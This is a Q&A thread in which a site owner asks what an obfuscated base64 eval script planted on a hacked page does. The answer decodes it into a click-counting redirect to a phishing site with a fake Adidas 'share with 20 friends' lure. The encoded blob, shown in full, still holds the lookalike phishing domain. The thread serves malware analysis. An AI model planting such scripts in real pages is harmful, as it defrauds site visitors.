# Decode strange JavaScript code

Tags: javascript

I don't know much about decoding and encoding, but I found this on my website (it was hacked and someone took over a page in my site). I analysed the page but can't read this:

```
<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>
```

What does it mean? and how can I read it?

Answer (score 4, accepted):

This is base64 encoded piece of code which is getting evaluated at runtime.

**Your Code**

```
<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>
```

**Decoding Steps (Easy One)**

1. GoTo [base63decode.org](https://www.base64decode.org/)
2. Copy Code inside atob block.
3. paste it in encoded string block and press decode.

**Decoded Code**

```
<script type="text/javascript">
eval(var c = 0;
$(document).ready(function() {
    $("#b1").on('click', function() {
        ++c;
        if (c > 15) {
            $(this).attr({
                href: "[ a phishing URL -- removed ]",
                target: "_self"
            });
        }
    });
    $("#b2").on('click', function() {
        if (c > 20) window.location = "[ a phishing URL -- removed ]";
        else window.alert("Deel aan 20 van je vrienden over WhatsApp de Adidas promotie!\n\n Je moet delen " + c);
    });
}););
</script>
```

**What this is doing**

First Code is getting decoded and after Capturing events happening on two buttons having unique id's b1 and b2 and based on clicks count decision is happening where the location is getting changed or a new tab is created with a phishing web site condition is upon 15 clicks you will click after will be this button and you will be navigated to this URL if anything goes wrong then after 20 clicks a new window will be generated with this URL.

Comment: It'd probably be helpful for you to explain how you did the base64 decoding.

Comment: @Jacob Thanks I added the more details how decoding was done.

Comment: I've edited the URL out of your code, as it may be malicious.

Comment: @duskwuff I appreciate that but that is for what is happening in this code so the Questioning Person can understand this thing pretty well.

Comment: @MuhammadZubairSaleem If the OP really wants to see the URL, they can repeat the steps you've included to see it for themselves, or simply view the history of the post. Standard practice on Stack Overflow is to omit malicious links from posts, as they can trigger some antivirus software -- and some people may be foolish enough to click them.

Comment: @duskwuff Thanks for your guidance I didn't know that earlier I will keep that in mind.

Comment: couldn't find the atob tab on the website

Comment: @ShadyMRasmy atob is javascript function which is used to decode base64 encoded strings.

in your case these are two buttons having id's b1 and b2

Comment: @MuhammadZubairSaleem thanks now i understand i saw the two buttons on the webpage it's called b1 and b2 .
i meant in base64 i coundn't find the atob block you used to decode